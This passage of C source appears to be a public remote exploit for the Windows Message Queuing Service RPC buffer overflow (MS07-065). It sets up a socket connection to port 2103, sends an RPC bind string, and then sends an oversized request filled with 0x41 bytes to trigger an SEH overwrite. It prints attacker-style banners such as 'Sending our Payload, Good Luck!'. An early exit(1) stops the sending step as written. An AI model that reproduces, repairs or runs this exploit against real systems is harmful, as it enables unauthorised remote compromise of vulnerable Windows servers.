connect (s, (struct sockaddr *) &target, sizeof (target));
if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1))
{
closesocket (s);
return -3;
}
if (i == 0)
{
closesocket (s);
return -4;
}
i = sizeof (int);
getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i);
if ((bf != 0) || (i != sizeof (int)))
{
closesocket (s);
return -5;
}
ioctlsocket (s, FIONBIO, &bf);
return s;
}
void
Disconnect (SOCKET s)
{
closesocket (s);
WSACleanup ();
}
/****************************************************/
int
main (int argc, char *argv[])
{
unsigned char *target = NULL;
unsigned char *name = NULL;
int port = 2103;
int i, j, len, len2;
int ret;
char buffer[6000] = { 0 };
SOCKET s;
WSADATA WSAData;
printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf
("--------------------------------------------------------------------------\n\n");
if (argc < 5)
usage (argv[0]); //Handle parameters
for (i = 1; i < argc; i++)
{
if ((argv[i][0] == ''-''))
{
switch (argv[i][1])
{
case ''h'':
target = (unsigned char *) argv[i + 1];
break;
case ''p'':
if (strcmp (argv[i + 1], "2103") == 0)
{
printf ("[+] Attacking default port 2103\n");
}
else
{
port = atoi (argv[i + 1]);
}
break;
case ''n'':
name = (unsigned char *) argv[i + 1];
break;
default:
printf ("[-] Invalid argument: %s\n", argv[i]);
usage (argv[0]);
break;
}
i++;
}
else
usage (argv[0]);
}
request_1b = malloc (sizeof (char) * (strlen (name) * 2));
if (request_1b == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
strcpy (request_1b, name);
for (i = 0, j = 0; j < (strlen (name) * 2); j++)
{
if (!(j % 2))
{
*(request_1b + j) = *(name + i);
}
else
{
*(request_1b + j) = ''\x00'';
i++;
}
}
/********************** attack payload ***************************/
if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
{
fprintf (stderr, "[-] WSAStartup failed.\n");
WSACleanup ();
exit (1);
}
Sleep (1200);
s = Make_Connection ((char *) target, port, 10);
if (s < 0)
{
fprintf (stderr, "[-] connect err.\n");
exit (1);
}
//Send our evil Payload
printf ("[*]Sending our Payload, Good Luck! ^_^\n");
printf ("[*]Sending RPC Bind String!\n");
send (s, bind_str, sizeof (bind_str), 0);
Sleep (1000);
printf ("[*]Sending RPC Request Now!\n");
len = 56 + (strlen (name) * 2) + 640;
request_1 = calloc (len, sizeof (char));
if (request_1 == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
memcpy (request_1, request_1a, 56);
memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
exit(1);
memset (buffer, ''\x41'', sizeof (buffer)); // fil the buffer to trigger seh
send (s, request_1, sizeof (request_1), 0);
send (s, buffer, 5104, 0); // fil the buffer to trigger seh
send (s, request_2, sizeof (request_2), 0);
Sleep (100);
memset (buffer, 0, sizeof (buffer));
ret = recv (s, buffer, sizeof (buffer) - 1, 0);
//printf("recv: %s\n", buffer);
Disconnect (s);
return 0;
}
